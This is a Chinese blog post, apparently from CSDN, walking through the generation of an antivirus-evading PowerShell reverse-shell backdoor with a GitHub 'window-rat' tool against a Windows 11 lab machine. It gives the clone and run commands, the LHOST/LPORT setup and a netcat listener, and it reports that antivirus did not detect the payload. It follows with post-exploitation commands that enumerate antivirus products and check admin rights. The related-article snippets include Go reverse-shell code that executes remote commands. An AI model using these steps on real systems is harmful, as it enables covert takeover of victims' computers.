PowerShell Payload后门免杀主流杀毒软件

最新推荐文章于 2024-01-14 11:04:51 发布
最新推荐文章于 2024-01-14 11:04:51 发布
阅读量533 收藏 4
点赞数 2
分类专栏: 网络安全 文章标签: 信息安全 网络安全 kali linux powershell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36010453/article/details/118439612
版权

 PowerShell Payload 后门测试

目标机:Windows 11  IP:192.168.120.164

攻击机:Kali   IP:192.168.120.133

 测试项目:https://github.com/machine1337/window-rat

cd /opt
git clone https://github.com/machine1337/window-rat.git
cd window-rat
chmod +x  exploit.sh
./exploit.sh

 出现以下这个页面就证明可以满足条件,接下来配置相关参数即可

Select:1 (·选择攻击类型)

Select:2 (选择局域网)

 这里一选项为广域网,二为局域网。我在这里的话选二。

LHOST 输入攻击机IP地址

LPORT 输入反弹至攻击机的端口

生成PowerShell如下:

输出的Payload位置:当前目录下的子目录中/output/bypass.ps1

目标机执行脚本,攻击机启用监听设置端口。

nc -lvnp 4444

杀毒软件没有报毒,成功拿到Windows控制权。

列出当前所安装的杀毒软件:

Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

 

 查看是否具有管理员权限提升:

If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "yes"; } else { echo "no"; }

回显yes,证明具有权限提升。

🍜完!!!

 

 

shellpei
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
Powershell工具Powercat(可以理解为免杀nc
墨痕诉清风的博客
04-15 912
Powershell工具Powercat(可以理解为免杀nc
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
连接nc的远控
m0_55772907的博客
05-27 730
免杀本 原理: 创建tcp连接,读取并执行cmd命令,并且将执行的结果通过目标的IP和端口号返回给我们的远控机(例如kali)。 package main import ( "io" "log" "net" "os/exec" ) func main() { conn, err := net.Dial("tcp", "192.168.0.138:1929") if err != nil { log.Fatalln(err) } for { cmd := exec.Co
PowerShell Payload执行和规避的乐趣
weixin_26722031的博客
08-02 384
In this article, we’re going to learn how to use COM objects and PowerShell in Windows to execute shell commands with a couple of techniques for evading some endpoint security. Specifically, what you ...
cs通过生成Payload上线(Powershell的两种上线方式)
最新发布
久恙502的博客
01-14 992
两种模式下的不同上线方法
windows反弹_反弹shell的各种姿势
weixin_32838901的博客
01-17 2761
来自公众号:Bypass在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)Linu...
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
2020.04-远控免杀从入门到实践(6)-代码篇-Powershell1
08-03
通过使用 Powershell,我们可以实现远控免杀,绕过安全软件和防火墙的检测。 在这篇文章中,我们将讨论以下几个方面的内容: 1. Powershell 基础知识 Powershell 是一个功能强大的 shellSCRIPTING 语言,可以用来...
Powershell读取本机注册表中的所有软件关联扩展名
09-22
在本话题中,我们将深入探讨如何使用Powershell读取本机注册表中的所有软件关联扩展名。 首先,我们需要理解“软件关联扩展名”的概念。扩展名,或文件扩展名,是文件名后缀,例如.txt、.docx等,它们与特定的应用...
powershell脚本大全
11-21
PowerShell是一种强大的命令行接口和脚本语言,主要用于管理和自动化Windows操作系统及应用程序。它由微软开发,旨在替代传统的命令提示符(CMD),提供更高级的功能和面向对象的接口。在"powershell脚本大全"中,...
nc超强免杀 nc免杀 NC汉化
07-11
过了该过的杀软!够强! 过了该过的杀软!够强! 过了该过的杀软!够强! 过了该过的杀软!够强! 过了该过的杀软!够强!
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3590
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
黑客实战之攻击篇——用NC打造成自己的简单后门
cexosoft的专栏
01-30 9176
大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。   首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc
PowerShell攻防进阶篇:nishang工具用法详解
weixin_33795806的博客
09-14 930
本文讲的是PowerShell攻防进阶篇:nishang工具用法详解, 1.简介 Nishang是一款针对PowerShell的渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源什么的都不重要。总之,nishang也是一款不可多得的好...
记一次PowerShell免杀实战
zhangge3663的博客
12-30 1727
最近在玩免杀,发现了一些免杀思路,今天来给大家做个分享,希望可以帮到大家。 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell的诞生就是要提供功能相当于UNIX系统的命令行壳程序(例如: sh、bash或csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。 powershell具有在硬盘中易绕过,内存中难查杀的特点。一般在后渗透
2018-2019-2 网络对抗技术 20165324 Exp2: 后门原理与实践
weixin_34347651的博客
03-20 200
2018-2019-2 网络对抗技术 20165324 Exp2: 后门原理与实践 课程学习: 后门 后门:是不经过正常认证流程而访问系统的通道,存在与编译器、操作系统、固件和应用中等等。 后门工作流程:程序→植入→运行→免杀后门工具:NC(netcat) 是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 NC命令 端口扫描 chat Server ...
免杀技术有一套(免杀方法大集结)
hackzkaq的博客
05-23 7277
零基础学黑客,搜索公众号:白帽子左一 00. 概述 什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就知道了。 01. 简介 免杀大概可以分为两种情况: 二进制的免杀(无源
MSF后门生成及免杀思想
qq_68233961的博客
11-14 1263
MSF后门生成及免杀思想
APT35 启用了新 PowerShell 后门
老司机的后备箱
07-27 169
近日,研究人员发现 Phosphorus(又名 CharmingKitten、APT35)组织的攻击行动有所增长。业界多次发现该组织对各行各业机构或人士发起攻击,甚至干预美国总统选举。Cybereason 的研究人员最近发现 APT35 使用了名为PowerLess的新型 PowerShell 后门。该后门通过在 .NET上下文中直接运行而非生成 PowerShell 进程来规避 PowerShell 安全检测。在攻击行动中使用的新工具集并不止新的 PowerShell
Cobalt Strike免杀:利用Powershell隐蔽上线
本文将介绍如何使用 Cobalt Strike 创建一个免杀PowerShell payload 并在目标环境中隐蔽上线。Cobalt Strike 是一款广泛用于红队操作和渗透测试的安全工具,其 beacon 功能允许攻击者在目标系统中维持持久的会话...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shellpei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值